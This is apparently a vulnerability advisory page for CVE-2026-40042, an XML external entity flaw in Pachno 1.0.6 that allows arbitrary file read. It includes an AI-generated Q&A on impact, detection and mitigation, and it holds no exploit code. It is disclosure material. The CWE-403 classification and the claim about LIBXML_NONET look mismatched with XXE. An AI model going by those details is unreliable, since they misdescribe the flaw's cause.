CVE-2026-40042
XML External Entity Injection in Pachno 1.0.6 Allows Arbitrary File Read
Publication date: 2026-04-13
Last updated on: 2026-04-13
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-403 | A process does not close sensitive file descriptors before invoking a child process, which allows the child to perform unauthorized I/O operations using those descriptors. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-40042 is a critical XML External Entity (XXE) injection vulnerability found in Pachno version 1.0.6 and earlier. It occurs in the Wiki TextParser component due to unsafe XML parsing using the PHP function simplexml_load_string() without the LIBXML_NONET flag, which normally prevents network access during XML parsing.
Attackers can exploit this vulnerability by injecting malicious XML entities through wiki table syntax and inline tags in issue descriptions, comments, and wiki articles. This injection triggers entity resolution that allows unauthenticated attackers to read arbitrary files on the server.
The vulnerability leads to exposure of file descriptors to unintended control, classified under CWE-403.
How can this vulnerability impact me? :
This vulnerability allows unauthenticated remote attackers to read arbitrary files on the affected server, potentially exposing sensitive information.
Because it requires no privileges or user interaction, it can be exploited easily and remotely.
The impact is critical, affecting confidentiality, integrity, and availability of the system, as indicated by its high CVSS scores (9.3 v4.0 and 9.8 v3.1).
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability involves XML external entity injection through unsafe XML parsing in the Pachno Wiki TextParser component. Detection would focus on identifying attempts to inject malicious XML entities via wiki table syntax and inline tags in issue descriptions, comments, and wiki articles.
Since the vulnerability exploits the PHP function simplexml_load_string() without the LIBXML_NONET flag, monitoring logs for unusual XML parsing errors or unexpected file access attempts may help detect exploitation attempts.
Specific commands are not provided in the available resources. However, general detection approaches could include:
- Reviewing web server logs for suspicious XML payloads containing ENTITY declarations.
- Using network monitoring tools to detect outbound network requests triggered by XML parsing.
- Employing intrusion detection systems (IDS) with signatures for XML external entity injection patterns.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include preventing unsafe XML parsing by ensuring the LIBXML_NONET flag is used with simplexml_load_string() to restrict network access during XML parsing.
Additionally, updating Pachno to a version later than 1.0.6 where this vulnerability is fixed is recommended.
Until a patch is applied, restricting user input that can include XML entities in wiki table syntax, issue descriptions, comments, and wiki articles can reduce the risk of exploitation.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows unauthenticated attackers to read arbitrary files on the server, leading to exposure of sensitive data. Such unauthorized data exposure can result in non-compliance with data protection regulations like GDPR and HIPAA, which mandate strict controls over the confidentiality and integrity of personal and sensitive information.
Because the vulnerability impacts confidentiality, integrity, and availability with high severity, organizations using affected versions of Pachno may face increased risk of data breaches, potentially violating regulatory requirements for protecting personal data and ensuring system security.